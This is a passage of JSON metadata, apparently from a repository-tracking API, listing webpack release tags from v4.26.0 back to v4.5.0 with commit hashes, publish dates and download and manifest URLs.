hub.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v